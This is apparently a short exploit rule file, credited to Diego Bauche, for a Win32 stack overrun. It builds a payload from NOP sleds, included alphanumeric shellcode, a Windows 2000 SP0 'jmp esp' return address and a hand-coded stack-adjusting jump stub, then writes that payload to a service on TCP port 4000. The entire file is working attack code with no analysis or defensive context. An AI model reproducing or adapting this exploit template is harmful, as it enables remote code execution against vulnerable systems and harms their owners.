# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">

var shellcode = $win32_alnum_scode

var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]

var nops_last = [\x90x36]

# jmp esp - windows 2000 sp0
var eip = |77e822ea|

# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4

var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back

port=4000/tcp

peer write: $payload

options=